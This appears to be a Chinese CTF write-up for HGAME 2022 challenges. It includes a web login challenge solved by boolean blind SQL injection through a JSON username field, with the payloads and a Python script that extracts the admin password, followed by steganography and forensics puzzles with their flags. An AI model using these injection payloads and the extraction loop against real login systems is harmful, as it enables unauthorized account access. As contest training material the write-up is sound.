![在这里插入图片描述](https://img-blog.csdnimg.cn/28049e281bd84bdda179fa2012ea2c17.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/13d333c894ba457bab39b91c57075fca.png)
username
只有admin和test两个用户,并且可以闭合这里形成注入
{"username":"admin' and '1","password":"mochu7"}
![在这里插入图片描述](https://img-blog.csdnimg.cn/ef05d30e9c114aae90127c9bc416af01.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/8aedf2418be44d658009dfd85439f622.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
这里需要注意的是,注入语法正常的时候返回:{"msg":"success!"}
,注入语法错误,或者用户名错误的都返回:{"msg":"invalid username or password"}
比较难测试区分的就是分辨是注入语句不对,还是这个关键字被过滤了,因为都是返回{"msg":"invalid username or password"}
,得一点点摸索
经过多次测试发现这里if
应该是行不通的
那么可以参考我以前的文章:记一次MySQL注入绕过
利用case when [express] then [x] else [y] end
代替if做条件判断
{"username":"admin'and case when 1=1 then 1 else 0 end and '1","password":"mochu7"}
![在这里插入图片描述](https://img-blog.csdnimg.cn/36dd8ccb5945476a8bee0127daa7f24f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/c1745afe5ace46d6a8f54c411350b9fe.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
直接查admin的password
import requests
asc_str = '0123456789abcdef'
burp0_url = "http://81906c3039.login.summ3r.top:60067/login"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json"}
password = ""
for i in range(1, 35):
for s in asc_str:
payload = "admin'and case when substr(password,{},1)='{}' then 1 else 0 end and '1".format(i, s)
burp0_json={"password": "mochu7", "username": payload}
resp = requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
if 'success' in resp.text:
password += s
print(password)
![在这里插入图片描述](https://img-blog.csdnimg.cn/660a16df004f4bed915b2c9954fd6b17.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
登录admin账号,然后得到flag
![在这里插入图片描述](https://img-blog.csdnimg.cn/403abb9890704763acebe26fa31bb439.png)
文章目录
- Level - Week1
-
- WEB
-
- easy_auth
- 蛛蛛…嘿嘿?我的蛛蛛
- Tetris plus
- Fujiwara Tofu Shop
- MISC
-
- 欢迎欢迎!热烈欢迎!
- 这个压缩包有点麻烦
- 好康的流量
- 群青(其实是幽灵东京)
- CRYPTO
-
- Dancing Line
- Matryoshka
- English Novel
- Level - Week2
-
- WEB
-
- Apache!
- webpack-engine
- At0m的留言板
- 一本单词书
- Pokemon
- MISC
-
- Level - Week3
-
- MISC
-
- WEB
-
- SecurityCenter
- Vidar shop demo
- LoginMe
- Level - Week4
-
Level - Week4
MISC
摆烂
![在这里插入图片描述](https://img-blog.csdnimg.cn/a88cbd7d586a4a62a6446345c5f11a09.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/08aa1b63e5db4b4d95229a1aadedc094.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/6d01ce459c2b46a590095db4a69e8018.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
从结构上来看应该是apng
,用apng disassembler
分离
![在这里插入图片描述](https://img-blog.csdnimg.cn/30584c64b7874187b8051f4af84bc831.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/87f86b5d6eaa463aadfe4acea9949d3d.png)
看起来一样的图片,大小不一样,猜测盲水印
![在这里插入图片描述](https://img-blog.csdnimg.cn/007fb99a233a4fa8922870d07c6a185d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
得到压缩包密码:4C*9wfg976
![在这里插入图片描述](https://img-blog.csdnimg.cn/b468ebd65c724e78bd6bcfa7f82a7897.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
拼图,用PS
![在这里插入图片描述](https://img-blog.csdnimg.cn/52da40facde74fdbb3aec832db652d00.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/ea6e315d6a8c42a79f7765d6a20aa4d1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
将得到的二维码用二维码在线站扫:https://products.aspose.app/barcode/recognize#
![在这里插入图片描述](https://img-blog.csdnimg.cn/3b9078d744db445386d829a06d4d4f96.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/e12dcebc53e3471d8127b40612457628.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
零宽度字符隐写:https://330k.github.io/misc_tools/unicode_steganography.html
![在这里插入图片描述](https://img-blog.csdnimg.cn/0770c0a1ab2341c4b9e883d75af9fd89.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{1_W4nT_T0_p1Ay_r0Tten}
At0m的给你们的(迟到的)情人节礼物
![在这里插入图片描述](https://img-blog.csdnimg.cn/6f4466657d11426aba9c054ee1ba6925.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
题目附件是RAR压缩的,使用winrar
解压
![在这里插入图片描述](https://img-blog.csdnimg.cn/7222593330a04aafa0a7f3c2ccc6ef0a.png)
ntfsstreamseditor
扫一下,发现NTFS流隐藏的文件
![在这里插入图片描述](https://img-blog.csdnimg.cn/4e5aaa0cc3374b979d629ec8f93505ac.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
秋名山车神Atom开车啦
4 up left down up right down up left up down right down up left down up right down up left up down right down up left down up right up down left up down right down up left down up right down up left up down right down up left up down down up up down right down up left up down right up down left up down right down up left up down right up
gift.mp4
视频中,出题人切屏的时候得到一个信息
![在这里插入图片描述](https://img-blog.csdnimg.cn/6535ee81422f458694ce63148cf2ee33.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
gift2.avi
极大可能使用了msu steg
,但是msu steg
解视频文件需要一个数字密码
NTFS流隐藏的文件提到的是开车,然后一个4开头,之后就是上下左右的方向,用笔画了一下
![在这里插入图片描述](https://img-blog.csdnimg.cn/56094f3f1249434ea8dcf2dcbb419dfd.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
画来画去得到一个H形状,联想到提到车,猜测可能是手动挡车的挡位
![在这里插入图片描述](https://img-blog.csdnimg.cn/2d985a60d5cf43909ec75a91b441c2d7.png)
从4
档开始,始终在1-4
档移动,猜测可能是四进制,把移动过程中经过的挡位记录下来
![在这里插入图片描述](https://img-blog.csdnimg.cn/313cfb3e96f94928a9125d99c39c9b45.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
得到一串数字,Python简单处理得到一串数字
from binascii import *
data = '424142414231424141214131413'
quater_num = ''
for n in data:
quater_num += str(int(n)-1)
flag = unhexlify(hex(int(quater_num, 4))[2:])
print(flag)
PS C:UsersAdministratorDownloadsgiftgift> python .code.py
b'7767122'
MSU Stego
![在这里插入图片描述](https://img-blog.csdnimg.cn/eaced8dc03ec48c0b1073f7e76124fad.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{Q1ng_R3n_J1e_Da_Sh4_CTF}
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)